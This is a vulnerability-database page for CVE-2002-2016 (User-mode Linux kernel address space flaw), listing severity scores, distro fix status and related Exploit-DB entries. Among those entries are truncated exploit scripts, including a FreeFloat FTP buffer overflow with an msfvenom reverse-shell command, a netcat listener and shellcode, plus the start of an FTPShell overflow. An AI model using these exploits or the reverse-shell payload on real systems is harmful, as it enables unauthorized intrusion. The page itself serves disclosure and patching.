CVE-2002-2016
published 2002-12-31CVE-2002-2016: User-mode Linux (UML) 2.4.17-8 does not restrict access to kernel address space, which allows local users to execute arbitrary code.
PriorityP425high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
1.14%
62.7th percentile
User-mode Linux (UML) 2.4.17-8 does not restrict access to kernel address space, which allows local users to execute arbitrary code.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | user-mode-linux | < user-mode-linux 2.4.17-9 (bookworm) | user-mode-linux 2.4.17-9 (bookworm) |
| user-mode_linux | user-mode_linux | — | — |
CVSS provenance
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
osv7.2HIGH
vendor_debian7.2HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Debian
CVE-2002-2016: user-mode-linux - User-mode Linux (UML) 2.4.17-8 does not restrict access to kernel address space,...
vendor_debian·2002·CVSS 7.2
CVE-2002-2016 [HIGH] CVE-2002-2016: user-mode-linux - User-mode Linux (UML) 2.4.17-8 does not restrict access to kernel address space,...
User-mode Linux (UML) 2.4.17-8 does not restrict access to kernel address space, which allows local users to execute arbitrary code.
Scope: local
bookworm: resolved (fixed in 2.4.17-9)
bullseye: resolved (fixed in 2.4.17-9)
forky: resolved (fixed in 2.4.17-9)
sid: resolved (fixed in 2.4.17-9)
trixie: resolved (fixed in 2.4.17-9)
GHSA
GHSA-q58j-xg5m-x6rj: User-mode Linux (UML) 2
ghsa_unreviewed·2022-04-30
CVE-2002-2016 [HIGH] GHSA-q58j-xg5m-x6rj: User-mode Linux (UML) 2
User-mode Linux (UML) 2.4.17-8 does not restrict access to kernel address space, which allows local users to execute arbitrary code.
OSV
CVE-2002-2016: User-mode Linux (UML) 2
osv·2002-12-31·CVSS 7.2
CVE-2002-2016 [HIGH] CVE-2002-2016: User-mode Linux (UML) 2
User-mode Linux (UML) 2.4.17-8 does not restrict access to kernel address space, which allows local users to execute arbitrary code.
No detection rules found.
Exploit-DB
Freefloat FTP Server 1.0 - 'ABOR' Remote Buffer Overflow
exploitdb·2016-11-01
Freefloat FTP Server 1.0 - 'ABOR' Remote Buffer Overflow
Freefloat FTP Server 1.0 - 'ABOR' Remote Buffer Overflow
---
#!/usr/bin/env python
#-*- coding: utf-8 -*-
# Exploit Title: FreeFloat FTP Server BoF ABOR Command
# Date: 29/10/2016
# Exploit Author: Ger
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
# Version: 1.0
# Tested on: Windows XP Profesional V. 2002 Service Pack 3
# CVE : n/a
import socket
#shellcode with metasploit
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.74.132 LPORT=443 -b '\x00\x0d\x0a' -f c
#nc -lvp 443
#send the exploit
ret='\x73\x18\x6E\x74' #MSCTF.dll
shellcode=("\xdd\xc6\xd9\x74\x24\xf4\x5d\xb8\x2a\xb4\x5a\x74\x29\xc9\xb1"
"\x52\x31\x45\x17\x03\x45\x17\x83\xef\xb0\xb8\x81\x13\x50\xbe"
"\x6a\xeb\xa1\xdf\xe3\x0e\x90\xdf\x90\x5b\x83\xef\xd3\x09\x28"
"\x9b\xb6\xb9\xbb\xe9\x1e\xce\x0c\x
Exploit-DB
FTPShell Client 5.24 - 'Create NewFolder' Local Buffer Overflow
exploitdb·2016-02-04
FTPShell Client 5.24 - 'Create NewFolder' Local Buffer Overflow
FTPShell Client 5.24 - 'Create NewFolder' Local Buffer Overflow
---
#[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
#[+] Exploit Title: FTPShell Client (Add New Folder) Local Buffer Overflow
#[+] Date: 2/2/2016
#[+]Exploit Author: Arash Khazaei
#[+] Vendor Homepage: www.ftpshell.com
#[+]Software Link: http://www.ftpshell.com/download.htm
#[+] Version: 5.24
#[+] Tested on: Windows XP Professional SP3 (Version 2002)
#[+] CVE : N/A
#[+] introduction : Add New Folder In Remote FTP Server And In Name Input Copy Buffer.txt File content
#[+] or click on Remote Tab Then Click On Create Folder And Copy Buffer.txt In Name Input ...
#[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
#!/usr/bin/python
filename = "buffer.txt"
# Junk A
junk = "A"*452
#
Exploit-DB
User-Mode Linux (Linux Kernel 2.4.17-8) - Memory Access Privilege Escalation
exploitdb·2000-08-25
CVE-2002-2016 User-Mode Linux (Linux Kernel 2.4.17-8) - Memory Access Privilege Escalation
User-Mode Linux (Linux Kernel 2.4.17-8) - Memory Access Privilege Escalation
---
source: https://www.securityfocus.com/bid/3973/info
User-Mode Linux (UML) is a patch which allows the Linux Kernel to run as a user space process. It is currently available for the Linux operating system. It may be used as an efficient tool for kernel development, as well as for virtual networking, honeypots, and experimentation.
UML does not correctly protect kernel address space from user programs within the UML environment. It may be possible to execute arbitrary code within the kernel and gain root access. Additionally, it may be possible to use this vulnerability to escape the UML environment, leading to local access on the hosting system.
This is a known problem with the current UML implementation.
http://archives.neohapsis.com/archives/bugtraq/2002-01/0338.htmlhttp://www.iss.net/security_center/static/8005.phphttp://www.securityfocus.com/bid/3973http://archives.neohapsis.com/archives/bugtraq/2002-01/0338.htmlhttp://www.iss.net/security_center/static/8005.phphttp://www.securityfocus.com/bid/3973
2002-12-31
Published